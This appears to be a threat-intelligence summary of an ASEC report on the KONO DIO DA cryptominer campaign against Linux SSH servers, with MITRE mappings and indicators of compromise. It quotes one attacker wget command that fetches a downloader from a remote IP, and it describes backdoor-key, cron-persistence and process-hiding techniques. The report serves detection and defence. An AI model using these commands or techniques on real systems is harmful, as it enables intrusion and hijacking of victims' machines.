Threat Research

CoinMiner (KONO DIO DA) Distributed to Linux SSH Servers – ASEC BLOG

Securonix

ASEC reports ongoing campaigns where XMRig CoinMiner is installed on poorly managed Linux SSH servers, using SHC-built malware and creating backdoor SSH accounts for persistence. The attacks, attributed to the KONO DIO DA threat actor, involve dictionary/dictionary-like brute forcing, staged downloads, and a multi-stage downloader chain that ends with mining software running under a disguised process. Hashtags: #KONO_DIO_DA #XMRig

Keypoints

  • CoinMiner (XMRig) is deployed on poorly managed Linux SSH servers, using SHC to package the malware and adding a backdoor SSH account for future access.
  • The attacks typically begin with dictionary or brute-force login attempts against publicly exposed SSH services to gain initial access.
  • Once inside, a multi-stage downloader chain is used: a downloader (am) compiled with SHC downloads another downloader (nw), which then retrieves and executes the XMRig miner and multiple Bash scripts.
  • The XMRig miner runs under a disguised process name (dbus-daemon) and uses a configured mining setup with multiple pools and wallets; cron is used to restart mining and maintain persistence.
  • Past campaigns used more complex features, including an SSH public key in a key file to authorize logins and a backdoor user (e.g., “cheeki”) for ongoing access.
  • Defensive evasion includes removing security tools (Aegis/Kinsing) and hiding the miner’s process via filesystem tricks; activities are orchestrated through a cron-based persistence mechanism.

MITRE Techniques

  • [T1110] Brute Force – Brute forcing or dictionary attacks against exposed Linux SSH servers to gain initial access. “If simple account credentials (ID/PW) are used in a Linux system, a threat actor can log into the system through brute force or a dictionary attack.”
  • [T1098.004] SSH Authorized Keys – Persistence via backdoor SSH key; threat actor copies their public key to “~/.ssh/authorized_keys” for future logins. “The threat actor creates and registers their public key, which is the ‘key’ file, to the ‘~/.ssh/authorized_keys’ path.”
  • [T1136.003] Create Account – Persistence by creating a new backdoor account (e.g., “cheeki”) and altering passwords on existing accounts. “usermod command to add an account called ‘cheeki’… the password is changed by the threat actor.”
  • [T1053.005] Cron – Scheduled Task/Cron usage to run mining scripts repeatedly (e.g., “nano.backup” cron task). “registered the cron task, which executes the ‘root.sh’ Bash script and ‘root.sh’ every minute.”
  • [T1036] Masquerading – The miner is executed under the name of a legitimate process (dbus-daemon) to blend in with normal system activity. “XMRig is executed under the disguised name of a normal process, ‘dbus-daemon’.”
  • [T1105] Ingress Tool Transfer – Downloader chain downloads components from remote servers (e.g., wget to fetch “am”). “# uname -a;nproc; wget -q 46.41.150[.]129/.bo/am ; …”
  • [T1027] Obfuscated/Compressed Files – The initial downloader is SHC-generated (a Bash script converted into a binary), indicating obfuscated/packed content. “The downloaded “am” file is malware that has been developed with SHC.”
  • [T1562] Impair Defenses – Attempts to disable or remove security tooling (e.g., uninstall.sh removing the Ali cloud shield and other monitor tools). “uninstall.sh… removing the Ali cloud shield (Ann Knight) of the security service Alibaba Cloud.”
  • [T1564] Hide Artifacts – Techniques to hide the miner process (mounting /var/tmp and bind-mounting to /proc to conceal the PID). “init.sh is an SHC ELF file… uses the mount command to bind the directory to the /proc file system on the PID of the miner process.”
  • [T1496] Resource Hijacking – Mining Monero using XMRig to utilize system resources for cryptocurrency mining. “XMRig CoinMiner” and mining configuration are present in the payloads.

Indicators of Compromise

  • [IP] 23.224.232[.]68 – Login source for dictionary attacks and attacks against SSH servers (Table 1).
  • [IP] 46.41.150[.]129 – Download URL for downloader (am) and related components.
  • [IP] 2.58.149[.]237 – Past/downloader server hosting files (hoze, xri2.tar).
  • [Domain] doi-2020[.]net – Mining pool domain and wallet associations.
  • [Domain] pool.hashvault[.]pro – Mining pool domain.
  • [Domain] pool.supportxmr[.]com – Mining pool domain.
  • [Domain] 141.95.19[.]91 – Download/command-and-control related domain/IP.
  • [Hash] ea30afd4f65f8866bebcaf92168f3241 – Latest version of the downloader (am).
  • [Hash] 1192697ed3d2302bec3ee828c154e300 – Latest version of the downloader Bash script (nw).
  • [Hash] 1db93cb95e409769561efb66e4fd5c72 – Bash script (start).
  • [Hash] 6e9001516053770f6dd645954240bced – Bash script (admin).
  • [Hash] a978aec11a072855e2cfba593160886e – Bash script (root.sh).
  • [Hash] 4f1661d873cef8a3fa3ca34080816e87 – XMRig CoinMiner (dbus-daemon invocation).
  • [Hash] 20ac8a45d129e3ce3444494d9672692c – XMRig Configuration File (config.json).
  • [SSH Key] ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCh047MLLA8ul64R+zVcEezUGtPUhnB+6mSzXoikFgju2orDUBX4K1ve/SW2pMQeQf9ErQojugX43N0iJYtuZUCgtH3A3oLV7zlhbkMuxjfgoUEovBXlAe9sXtLPnbYE999hT0M+OVv2l5/dDgiXs3eG9/BtcuPBEQ4lnH2YdFkckUJmrQQctA1ItFGTNB9fiFu44bH7JjRxSPt97PJPjeEcbEMdJyx4y827NpogeL2QSCfj7II9XdfgaarEOeEF9abY6+1RqDhElhz4ZSQTfoSkl8/8LyBXun7ybdVYxxJdxGznDpNBHyYEcKZFRy9q4mTHBeXMlWiGimSpE7dyhuT rsa-key – Public SSH key used for authorized_keys.
  • [File] am – Downloader/binary dropped by SHC; nw – secondary downloader; start/admin/root.sh – script components.
  • [Cron] nano.backup – Cron job/file name used for persistence.

Read more: https://asec.ahnlab.com/en/51908/